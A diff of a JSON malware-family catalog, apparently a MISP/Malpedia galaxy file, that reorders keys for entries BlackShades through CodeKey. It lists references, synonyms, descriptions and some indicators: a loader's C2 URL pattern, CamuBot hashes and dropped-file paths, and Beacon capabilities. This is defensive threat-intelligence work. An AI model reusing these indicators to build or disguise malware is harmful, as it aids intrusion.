"https://blog.malwarebytes.com/threat-analysis/2014/05/taking-off-the-blackshades/", "https://blog.malwarebytes.com/threat-analysis/2012/06/you-dirty-rat-part-2-blackshades-net/", "https://blog.malwarebytes.com/threat-analysis/2012/06/blackshades-in-syria/", "http://contagiodump.blogspot.com/2012/06/rat-samples-from-syrian-targeted.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "0fb57d46-1c4f-49a3-80c2-05bcaa34ec1b", - "value": "BlackShades", - "description": "" + "value": "BlackShades" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.boaxxe", "https://www.welivesecurity.com/2014/03/18/operation-windigo-the-vivisection-of-a-large-linux-server-side-credential-stealing-malware-campaign/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "2f11eb73-4faa-48c5-b217-11e139962c6f", - "value": "Boaxxe", - "description": "" + "value": "Boaxxe" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bohmini" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "444ca9d1-7128-40fa-9665-654194dfbe0b", - "value": "Bohmini", - "description": "" + "value": "Bohmini" }, { + "description": "", "meta": { - "synonyms": [ - "KBOT" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bolek", "https://asert.arbornetworks.com/communications-bolek-trojan/", "http://www.cert.pl/news/11379" - ] + ], + "synonyms": [ + "KBOT" + ], + "type": [] }, "uuid": "d3af810f-e657-409c-b821-4b1cf727ad18", - "value": "Bolek", - "description": "" + "value": "Bolek" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bouncer", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "80487bca-7629-4cb2-bf5b-993d5568b699", - "value": "Bouncer", - "description": "" + "value": "Bouncer" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bozok", "https://www.fireeye.com/blog/threat-research/2013/10/know-your-enemy-tracking-a-rapidly-evolving-apt-actor.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "f9d0e934-879c-4668-b959-6bf7bdc96f5d", - "value": "Bozok", - "description": "" + "value": "Bozok" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.brambul", "https://www.us-cert.gov/ncas/alerts/TA18-149A", "https://www.us-cert.gov/ncas/analysis-reports/AR18-149A", "https://www.acalvio.com/lateral-movement-technique-employed-by-hidden-cobra/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "d97ae60e-612a-4feb-908a-8c4d32e9d763", - "value": "Brambul", - "description": "" + "value": "Brambul" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bravonc", "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "fbed27da-551d-4793-ba7e-128256326909", - "value": "BravoNC", - "description": "" + "value": "BravoNC" }, { + "description": "There is no reference available for this family and all known samples have version 1.0.0.\r\n\r\nPdb-strings in the samples suggest that this is an \"exclusive\" loader, known as \"breakthrough\" (maybe), e.g. C:\\Users\\Exclusiv\\Desktop\\хп-пробив\\Release\\build.pdb\r\n\r\nThe communication url parameters are pretty unique in this combination:\r\ngate.php?hwid=&os=&build=1.0.0&cpu=8\r\n\r\n is one of:\r\nWindows95\r\nWindows98\r\nWindowsMe\r\nWindows95family\r\nWindowsNT3\r\nWindowsNT4\r\nWindows2000\r\nWindowsXP\r\nWindowsServer2003\r\nWindowsNTfamily\r\nWindowsVista\r\nWindows7\r\nWindows8\r\nWindows10\r\n", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.breakthrough_loader", "https://malpedia.caad.fkie.fraunhofer.de" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "a05b8e4b-a686-439f-8094-037fbcda52bd", - "value": "Breakthrough", - "description": "There is no reference available for this family and all known samples have version 1.0.0.\r\n\r\nPdb-strings in the samples suggest that this is an \"exclusive\" loader, known as \"breakthrough\" (maybe), e.g. C:\\Users\\Exclusiv\\Desktop\\хп-пробив\\Release\\build.pdb\r\n\r\nThe communication url parameters are pretty unique in this combination:\r\ngate.php?hwid=&os=&build=1.0.0&cpu=8\r\n\r\n is one of:\r\nWindows95\r\nWindows98\r\nWindowsMe\r\nWindows95family\r\nWindowsNT3\r\nWindowsNT4\r\nWindows2000\r\nWindowsXP\r\nWindowsServer2003\r\nWindowsNTfamily\r\nWindowsVista\r\nWindows7\r\nWindows8\r\nWindows10\r\n" + "value": "Breakthrough" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bredolab", "https://www.fireeye.com/blog/threat-research/2010/10/bredolab-its-not-the-size-of-the-dog-in-fight.html", "https://securelist.com/end-of-the-line-for-the-bredolab-botnet/36335/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "55d343a1-7e80-4254-92eb-dfb433b91a90", - "value": "Bredolab", - "description": "" + "value": "Bredolab" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.brutpos", "https://www.fireeye.com/blog/threat-research/2014/07/brutpos-rdp-bruteforcing-botnet-targeting-pos-systems.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "e413c33a-badd-49a1-8d44-c9a0983b5151", - "value": "BrutPOS", - "description": "" + "value": "BrutPOS" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bs2005", "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", "https://github.com/nccgroup/Royal_APT" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "35e00ff0-704e-4e61-b9bb-9ed20a4a008f", - "value": "BS2005", - "description": "" + "value": "BS2005" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.btcware", "https://www.bleepingcomputer.com/news/security/new-nuclear-btcware-ransomware-released-updated/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "d29786c6-2cc0-4e2f-97b0-242a1d9e9bf8", - "value": "BTCWare", - "description": "" + "value": "BTCWare" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bugat_alreadydump" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "16794655-c0e2-4510-9169-f862df104045", - "value": "Bugat", - "description": "" + "value": "Bugat" }, { + "description": "", "meta": { - "synonyms": [ - "Ratopak" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.buhtrap", "https://www.arbornetworks.com/blog/asert/diving-buhtrap-banking-trojan-activity/", "https://www.symantec.com/connect/blogs/russian-bank-employees-received-fake-job-offers-targeted-email-attack", "https://www.group-ib.com/brochures/gib-buhtrap-report.pdf", "https://www.welivesecurity.com/2015/04/09/operation-buhtrap/" - ] + ], + "synonyms": [ + "Ratopak" + ], + "type": [] }, "uuid": "fa278536-8293-4717-86b5-8a03aa11063f", - "value": "Buhtrap", - "description": "" + "value": "Buhtrap" }, { + "description": "", "meta": { - "synonyms": [ - "R2D2", - "0zapftis" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bundestrojaner", "http://www.ccc.de/system/uploads/76/original/staatstrojaner-report23.pdf", "http://www.stoned-vienna.com/analysis-of-german-bundestrojaner.html", "https://www.f-secure.com/weblog/archives/00002249.html" - ] + ], + "synonyms": [ + "R2D2", + "0zapftis" + ], + "type": [] }, "uuid": "04aeda9f-7923-45d1-ab74-9dddd8612d47", - "value": "Bundestrojaner", - "description": "" + "value": "Bundestrojaner" }, { + "description": "Bunitu is a trojan that exposes infected computers to be used as a proxy for remote clients. It registers itself at startup by providing its address and open ports. Access to Bunitu proxies is available by using criminal VPN services (e.g.VIP72).", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bunitu", "https://blog.malwarebytes.com/threat-analysis/2015/07/revisiting-the-bunitu-trojan/", "https://blog.malwarebytes.com/threat-analysis/2015/08/whos-behind-your-proxy-uncovering-bunitus-secrets/", "http://malware-traffic-analysis.net/2017/05/09/index.html", "https://zerophagemalware.com/2017/06/07/rig-ek-via-fake-eve-online-website-drops-bunitu/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "4350b52a-8100-49b5-848d-d4a4029e949d", - "value": "Bunitu", - "description": "Bunitu is a trojan that exposes infected computers to be used as a proxy for remote clients. It registers itself at startup by providing its address and open ports. Access to Bunitu proxies is available by using criminal VPN services (e.g.VIP72)." + "value": "Bunitu" }, { + "description": "", "meta": { - "synonyms": [ - "spyvoltar" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.buterat", "http://antivirnews.blogspot.com/2011/01/backdoorwin32-buteratafj.html" - ] + ], + "synonyms": [ + "spyvoltar" + ], + "type": [] }, "uuid": "cd4ee7f0-394e-4129-a1dc-d5fb423f2311", - "value": "Buterat", - "description": "" + "value": "Buterat" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.buzus" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "69a3e0ed-1727-4a9c-ae21-1e32322ede93", - "value": "Buzus", - "description": "" + "value": "Buzus" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.byeby", "https://researchcenter.paloaltonetworks.com/2017/09/unit42-threat-actors-target-government-belarus-using-cmstar-trojan" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "12886243-55b6-4864-bf7a-7e2439e3a4c1", - "value": "BYEBY", - "description": "" + "value": "BYEBY" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.c0d0so0" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "b6b187d0-e19f-489a-91c0-7c94519555f6", - "value": "c0d0so0", - "description": "" + "value": "c0d0so0" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cabart" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "fe1d51d8-f0e8-4f71-bf5c-724f7d4a824c", - "value": "CabArt", - "description": "" + "value": "CabArt" }, { + "description": "", "meta": { - "synonyms": [ - "Cadelle" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cadelspy", "http://www.symantec.com/content/en/us/enterprise/media/security_response/docs/CadelSpy-Remexi-IOC.pdf" - ] + ], + "synonyms": [ + "Cadelle" + ], + "type": [] }, "uuid": "cad83c5e-2081-4ab4-81c7-32cfc16eae66", - "value": "CadelSpy", - "description": "" + "value": "CadelSpy" }, { + "description": "There is no lot of IOCs in this article so we take one sample and try to extract some interesting IOCs, our findings below :\r\n\r\nCamuBot sample : 37ca2e37e1dc26d6b66ba041ed653dc8ee43e1db71a705df4546449dd7591479\r\n\r\nDropped Files on disk :\r\n\r\nC:\\Users\\user~1\\AppData\\Local\\Temp\\protecao.exe : 0af612461174eedec813ce670ba35e74a9433361eacb3ceab6d79232a6fe13c1\r\n\r\nC:\\Users\\user~1\\AppData\\Local\\Temp\\Renci.SshNet.dll : 3E3CD9E8D94FC45F811720F5E911B892A17EE00F971E498EAA8B5CAE44A6A8D8\r\n\r\nC:\\ProgramData\\m.msi : AD90D4ADFED0BDCB2E56871B13CC7E857F64C906E2CF3283D30D6CFD24CD2190\r\n\r\nProtecao.exe try to download hxxp://www.usb-over-network.com/usb-over-network-64bit.msi\r\n\r\nA new driver is installed : C:\\Windows\\system32\\drivers\\ftusbload2.sys : 9255E8B64FB278BC5FFE5B8F70D68AF8\r\n\r\nftusbload2.sys set 28 IRP handlers.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.camubot", "https://securityintelligence.com/camubot-new-financial-malware-targets-brazilian-banking-customers/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "ecac83ab-cd64-4def-979a-40aeeca0400b", - "value": "CamuBot", - "description": "There is no lot of IOCs in this article so we take one sample and try to extract some interesting IOCs, our findings below :\r\n\r\nCamuBot sample : 37ca2e37e1dc26d6b66ba041ed653dc8ee43e1db71a705df4546449dd7591479\r\n\r\nDropped Files on disk :\r\n\r\nC:\\Users\\user~1\\AppData\\Local\\Temp\\protecao.exe : 0af612461174eedec813ce670ba35e74a9433361eacb3ceab6d79232a6fe13c1\r\n\r\nC:\\Users\\user~1\\AppData\\Local\\Temp\\Renci.SshNet.dll : 3E3CD9E8D94FC45F811720F5E911B892A17EE00F971E498EAA8B5CAE44A6A8D8\r\n\r\nC:\\ProgramData\\m.msi : AD90D4ADFED0BDCB2E56871B13CC7E857F64C906E2CF3283D30D6CFD24CD2190\r\n\r\nProtecao.exe try to download hxxp://www.usb-over-network.com/usb-over-network-64bit.msi\r\n\r\nA new driver is installed : C:\\Windows\\system32\\drivers\\ftusbload2.sys : 9255E8B64FB278BC5FFE5B8F70D68AF8\r\n\r\nftusbload2.sys set 28 IRP handlers." + "value": "CamuBot" }, { + "description": "Cannibal Rat is a python written remote access trojan with 4 versions as of March 2018. The RAT is reported to impact users of a Brazilian public sector management school. The RAT is distributed in a py2exe format, with the python27.dll and the python bytecode stored as a PE resource and the additional libraries zipped in the overlay of the executable.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cannibal_rat", "http://blog.talosintelligence.com/2018/02/cannibalrat-targets-brazil.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "1e722d81-085e-4beb-8901-aa27fe502dba", - "value": "Cannibal Rat", - "description": "Cannibal Rat is a python written remote access trojan with 4 versions as of March 2018. The RAT is reported to impact users of a Brazilian public sector management school. The RAT is distributed in a py2exe format, with the python27.dll and the python bytecode stored as a PE resource and the additional libraries zipped in the overlay of the executable." + "value": "Cannibal Rat" }, { + "description": "", "meta": { - "synonyms": [ - "Anunak" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.carbanak", "https://securelist.com/files/2015/02/Carbanak_APT_eng.pdf", "https://www.fox-it.com/en/wp-content/uploads/sites/11/Anunak_APT-against-financial-institutions2.pdf", "https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html" - ] + ], + "synonyms": [ + "Anunak" + ], + "type": [] }, "uuid": "8c246ec4-eaa5-42c0-b137-29f28cbb6832", - "value": "Carbanak", - "description": "" + "value": "Carbanak" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.carberp" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "8f0d4866-7c67-4376-a6f2-958224d3c9d0", - "value": "Carberp", - "description": "" + "value": "Carberp" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cardinal_rat", "http://researchcenter.paloaltonetworks.com/2017/04/unit42-cardinal-rat-active-two-years/?adbsc=social71702736&adbid=855028404965433346&adbpl=tw&adbpr=4487645412" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "3d3da4c0-004c-400c-9da6-f83fd35d907e", - "value": "Cardinal RAT", - "description": "" + "value": "Cardinal RAT" }, { + "description": "ESET describes Casper as a well-developed reconnaissance tool, making extensive efforts to remain unseen on targeted machines. Of particular note are the specific strategies adopted against anti-malware software. Casper was used against Syrian targets in April 2014, which makes it the most recent malware from this group publicly known at this time.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.casper", "https://www.welivesecurity.com/2015/03/05/casper-malware-babar-bunny-another-espionage-cartoon/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "3198501e-0ff0-43b7-96f0-321b463ab656", - "value": "Casper", - "description": "ESET describes Casper as a well-developed reconnaissance tool, making extensive efforts to remain unseen on targeted machines. Of particular note are the specific strategies adopted against anti-malware software. Casper was used against Syrian targets in April 2014, which makes it the most recent malware from this group publicly known at this time." + "value": "Casper" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.catchamas", "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "8060dbdc-cf31-40bc-9900-eb8119423c50", - "value": "Catchamas", - "description": "" + "value": "Catchamas" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ccleaner_backdoor", "https://blog.avast.com/new-investigations-in-ccleaner-incident-point-to-a-possible-third-stage-that-had-keylogger-capacities", @@ -4337,61 +4339,59 @@ "http://blog.morphisec.com/morphisec-discovers-ccleaner-backdoor", "https://www.crowdstrike.com/blog/in-depth-analysis-of-the-ccleaner-backdoor-stage-2-dropper-and-its-payload/", "http://blog.talosintelligence.com/2017/09/ccleaner-c2-concern.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "c51ee09b-fc2d-41fd-a43b-426a4f337139", - "value": "CCleaner Backdoor", - "description": "" + "value": "CCleaner Backdoor" }, { + "description": "", "meta": { - "synonyms": [ - "cerebrus" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.centerpos", "https://www.fireeye.com/blog/threat-research/2016/01/centerpos_an_evolvi.html" - ] + ], + "synonyms": [ + "cerebrus" + ], + "type": [] }, "uuid": "fca8c5e0-4fef-408c-bcd7-9826271e8e5d", - "value": "CenterPOS", - "description": "" + "value": "CenterPOS" }, { + "description": "A prolific ransomware which originally added \".cerber\" as a file extension to encrypted files. Has undergone multiple iterations in which the extension has changed. Uses a very readily identifiable set of of UDP activity to checkin and report infections. Primarily uses TOR for payment information.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cerber", "http://blog.trendmicro.com/trendlabs-security-intelligence/cerber-starts-evading-machine-learning/", "https://blog.malwarebytes.com/threat-analysis/2016/03/cerber-ransomware-new-but-mature/", "https://www.virusbulletin.com/virusbulletin/2017/12/vb2017-paper-nine-circles-cerber/", "https://rinseandrepeatanalysis.blogspot.com/2018/08/reversing-cerber-raas.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "79a7203a-6ea5-4c39-abd4-faa20cf8821a", - "value": "Cerber", - "description": "A prolific ransomware which originally added \".cerber\" as a file extension to encrypted files. Has undergone multiple iterations in which the extension has changed. Uses a very readily identifiable set of of UDP activity to checkin and report infections. Primarily uses TOR for payment information." + "value": "Cerber" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cerbu_miner" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "ba7706c1-7d2a-4031-9acc-cb862860da1a", - "value": "Cerbu", - "description": "" + "value": "Cerbu" }, { + "description": "", "meta": { - "synonyms": [ - "Ham Backdoor" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.chches", "https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html", @@ -4399,210 +4399,210 @@ "https://www.jpcert.or.jp/magazine/acreport-ChChes.html", "http://researchcenter.paloaltonetworks.com/2017/02/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/", "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf" - ] + ], + "synonyms": [ + "Ham Backdoor" + ], + "type": [] }, "uuid": "6eee9bf9-ffce-4c88-a5ad-9d80f6fc727c", - "value": "ChChes", - "description": "" + "value": "ChChes" }, { + "description": "", "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cherry_picker", + "https://www.trustwave.com/Resources/SpiderLabs-Blog/Shining-the-Spotlight-on-Cherry-Picker-PoS-Malware/", + "https://www.trustwave.com/Resources/SpiderLabs-Blog/New-Memory-Scraping-Technique-in-Cherry-Picker-PoS-Malware/" + ], "synonyms": [ "cherrypickerpos", "cherrypicker", "cherry_picker" ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.cherry_picker", - "https://www.trustwave.com/Resources/SpiderLabs-Blog/Shining-the-Spotlight-on-Cherry-Picker-PoS-Malware/", - "https://www.trustwave.com/Resources/SpiderLabs-Blog/New-Memory-Scraping-Technique-in-Cherry-Picker-PoS-Malware/" - ] + "type": [] }, "uuid": "e6ab90d3-8011-4927-a0cd-eab57e7971aa", - "value": "CherryPicker POS", - "description": "" + "value": "CherryPicker POS" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.chewbacca", "http://vinsula.com/2014/03/01/chewbacca-tor-based-pos-malware/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "2137a0ce-8d06-4538-ad0b-6ab6ec865493", - "value": "ChewBacca", - "description": "" + "value": "ChewBacca" }, { + "description": "Adware that shows advertisements using plugin techniques for popular browsers", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.chinad" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "098cfb93-8921-48f0-a694-a83f350e8a61", - "value": "Chinad", - "description": "Adware that shows advertisements using plugin techniques for popular browsers" + "value": "Chinad" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.chir" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "59b5697a-5154-4c08-87f8-c71b0e8425fc", - "value": "Chir", - "description": "" + "value": "Chir" }, { + "description": "", "meta": { - "synonyms": [ - "AndroKINS" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.chthonic", "https://www.proofpoint.com/us/threat-insight/post/threat-actors-using-legitimate-paypal-accounts-to-distribute-chthonic-banking-trojan", "https://www.s21sec.com/en/blog/2017/07/androkins/", "https://securelist.com/chthonic-a-new-modification-of-zeus/68176/" - ] + ], + "synonyms": [ + "AndroKINS" + ], + "type": [] }, "uuid": "9441a589-e23d-402d-9603-5e55e3e33971", - "value": "Chthonic", - "description": "" + "value": "Chthonic" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.citadel", "https://blog.malwarebytes.com/threat-analysis/2012/11/citadel-a-cyber-criminals-ultimate-weapon/", "http://www.xylibox.com/2016/02/citadel-0011-atmos.html", "http://blog.jpcert.or.jp/2016/02/banking-trojan--27d6.html", "https://www.arbornetworks.com/blog/asert/the-citadel-and-gameover-campaigns-of-5cb682c10440b2ebaf9f28c1fe438468/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "7f550cae-98b7-4a0c-bed2-d79227dc6310", - "value": "Citadel", - "description": "" + "value": "Citadel" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.client_maximus", "https://securityintelligence.com/client-maximus-new-remote-overlay-malware-highlights-rising-malcode-sophistication-in-brazil/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "c2bd0771-55d6-4242-986d-4bfd735998ba", - "value": "Client Maximus", - "description": "" + "value": "Client Maximus" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cloud_duke", "https://www.f-secure.com/weblog/archives/00002822.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "40baac36-2fd0-49b3-b05b-1087d60f4f2c", - "value": "Cloud Duke", - "description": "" + "value": "Cloud Duke" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cmsbrute", "https://securelist.com/the-shade-encryptor-a-double-threat/72087/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "ad960c5c-f2a1-405e-a32a-31f75b7c6859", - "value": "CMSBrute", - "description": "" + "value": "CMSBrute" }, { + "description": "", "meta": { - "synonyms": [ - "meciv" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cmstar", "https://researchcenter.paloaltonetworks.com/2016/03/digital-quartermaster-scenario-demonstrated-in-attacks-against-the-mongolian-government/", "https://researchcenter.paloaltonetworks.com/2017/09/unit42-threat-actors-target-government-belarus-using-cmstar-trojan", "https://twitter.com/ClearskySec/status/963829930776723461", "https://www.votiro.com/single-post/2018/02/13/New-campaign-targeting-Ukrainians-holds-secrets-in-documents-properties" - ] + ], + "synonyms": [ + "meciv" + ], + "type": [] }, "uuid": "e4e15ab4-9ba6-444a-b154-2854757e792e", - "value": "CMSTAR", - "description": "" + "value": "CMSTAR" }, { + "description": "Cobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to:\r\n\r\n* Execute commands\r\n* Log keystrokes\r\n* Upload/download files\r\n* SOCKS proxy\r\n* Privilege escalation\r\n* Mimikatz\r\n* Port scanning\r\n* Lateral Movement\r\n\r\nThe Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike", "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks", "https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html", "https://blog.cobaltstrike.com/2018/04/09/cobalt-strike-3-11-the-snake-that-eats-its-tail/", "https://www.lac.co.jp/lacwatch/people/20180521_001638.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "1a1d3ea4-972e-4c48-8d85-08d9db8f1550", - "value": "Cobalt Strike", - "description": "Cobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to:\r\n\r\n* Execute commands\r\n* Log keystrokes\r\n* Upload/download files\r\n* SOCKS proxy\r\n* Privilege escalation\r\n* Mimikatz\r\n* Port scanning\r\n* Lateral Movement\r\n\r\nThe Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable." + "value": "Cobalt Strike" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobian_rat", "https://www.zscaler.com/blogs/research/cobian-rat-backdoored-rat", "https://securityaffairs.co/wordpress/62573/malware/cobian-rat-backdoor.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "aa553bbd-f6e4-4774-9ec5-4607aa2004b8", - "value": "Cobian RAT", - "description": "" + "value": "Cobian RAT" }, { + "description": "CobInt, is a self-developed backdoor of the Cobalt group. The modular tool has capabilities to collect initial intelligence information about the compromised machine and stream video from its desktop. If the operator decides that the system is of interest, the backdoor will download and launch CobaltStrike framework stager.", "meta": { - "synonyms": [ - "COOLPANTS" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobint", "https://www.proofpoint.com/us/threat-insight/post/new-modular-downloaders-fingerprint-systems-part-3-cobint", "https://www.group-ib.com/blog/renaissance", "https://asert.arbornetworks.com/double-the-infection-double-the-fun/" - ] + ], + "synonyms": [ + "COOLPANTS" + ], + "type": [] }, "uuid": "23160942-6de6-41c0-8d8c-44876191c3f0", - "value": "CobInt", - "description": "CobInt, is a self-developed backdoor of the Cobalt group. The modular tool has capabilities to collect initial intelligence information about the compromised machine and stream video from its desktop. If the operator decides that the system is of interest, the backdoor will download and launch CobaltStrike framework stager." + "value": "CobInt" }, { + "description": "", "meta": { - "synonyms": [ - "Carbon" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobra", "https://blog.gdatasoftware.com/2015/01/23926-analysis-of-project-cobra", @@ -4610,342 +4610,344 @@ "https://securelist.com/analysis/publications/65545/the-epic-turla-operation/", "https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/", "https://github.com/hfiref0x/TDL" - ] + ], + "synonyms": [ + "Carbon" + ], + "type": [] }, "uuid": "f75452f3-6a4a-4cd6-b3e0-089fa320e9b9", - "value": "Cobra Carbon System", - "description": "" + "value": "Cobra Carbon System" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cockblocker", "https://twitter.com/JaromirHorejsi/status/817311664391524352" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "77e85a95-6a78-4255-915a-488eb73ee82f", - "value": "CockBlocker", - "description": "" + "value": "CockBlocker" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.codekey", "https://www.rsa.com/content/dam/pdfs/2-2017/kingslayer-a-supply-chain-attack.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "cb5bad79-707c-493d-8a2b-4c0be38301c5", - 